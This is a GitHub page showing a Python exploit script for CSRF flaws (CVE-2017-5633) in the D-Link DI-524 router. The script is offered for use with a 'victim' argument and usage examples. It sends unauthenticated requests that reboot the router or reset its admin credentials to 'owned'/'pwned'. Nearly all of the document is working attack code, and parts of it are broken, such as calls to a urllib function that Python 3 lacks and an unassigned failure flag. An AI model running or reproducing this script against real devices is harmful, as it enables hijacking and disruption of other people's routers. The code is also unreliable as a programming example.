-
Notifications
You must be signed in to change notification settings - Fork 2
/
exploitrouter524.py
113 lines (96 loc) · 4.27 KB
/
exploitrouter524.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
# Exploit Title: Multiple CSRF in D-Link DI-524 Wireless Router
# Date: 2017-04-17
# Exploit Author: Carlos Daniel Giovanella
# Product: D-Link DI-524 Wireless
# Software Link: https://dlink.com.br/produto/di-524150
# Version: Firmware 9.01
# CVE : CVE-2017-5633
# Tested on: Windows 7, 8, 10
# Python Version: 3.4+
# Usage: py exploitrouter524.py --victim "Gateway"
import os, sys, time
import urllib.request
import json
from urllib.parse import *
def animaesseinferno():
print ("Exploiting... ** " + alvo)
time.sleep(3)
print ("\rExploiting... *** " + alvo)
time.sleep(3)
try:
if sys.argv[1] == "--victim":
if sys.argv[3] == "--reboot":
os.system("cls")
alvo = sys.argv[2]
animaesseinferno()
if not "http://" in sys.argv[2]:
alvourl = ("http://"+alvo+"cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status")
print (alvourl)
if not alvo.endswith("/"):
alvourl = ("http://"+alvo+"/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status")
print (alvourl)
else:
alvourl = (alvo+"/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status")
print (alvourl)
try:
acessa = urllib.request.urlopen(alvourl)
resposta = urllib.urlopen(acessa)
lerpage = resposta.read()
except urllib.error.HTTPError as err:
if err.code == 404:
os.system ("color c")
print ("\n\n###### Wrong url / page didn't found. #######")
time.sleep(2)
else:
os.system ("color a")
print ("Sucessfull rebooted!")
print ("\n Victim :"+ alvo)
if sys.argv[3] == "--admin":
try:
os.system("cls")
alvo = sys.argv[2]
alvourl = alvo + "/cgi-bin/pass"
valorespost = {'rc' : '@atxbox',
'Pa' : 'owned',
'P1' : 'pwned' }
dados = urllib.parse.urlencode(valorespost)
if not "http://" in sys.argv[2]:
alvourl = "http://" + alvourl
dados = dados.encode('UTF-8')
json_data = json.dumps(valorespost).encode('utf8')
pededado = urllib.request.urlopen(alvourl, json_data)
resposta = urllib.urlopen(pededado)
finalmente = resposta.read().decode('utf-8')
except urllib.error.HTTPError as err:
os.system ("color c")
print (err)
falha = 1
if falha != 1:
os.system ("color a")
print ("Sucessfully exploited!")
print ("\n Victim :"+ alvo)
print ("Username: owned")
print ("Password: pwned")
print (finalmente)
print (resposta)
print (dados)
print (alvourl)
except IndexError:
def inicio():
os.system("cls")
os.system("mode 100,40")
print (' -----------------------------Made by--------------------------------------')
print (' # Carlos Daniel Giovanella (car.dangi@hotmail.com)')
print (' # ')
print (' # Facebook: www.fb.com/KiritoKirigayaKazutoKunZ')
print (' # Github: github.com/cardangi')
print (' # LinkedIn: https://www.linkedin.com/in/carlos-d-870792128/')
print (' # ')
print (' # Usage:')
print (' # exploitrouter524.py --victim gateway (default 192.168.0.1/) --admin (change admin account)')
print (' # exploitrouter524.py --victim gateway (default 192.168.0.1/) --reboot (reboot the device)')
print (' # Real example: exploitrouter524.py --victim 192.168.1.1/ --reboot')
print (' # ')
print (' # I do not take any responsibility and we are not liable for any damage caused.')
print (' -------------------------------------------------------------------------')
inicio()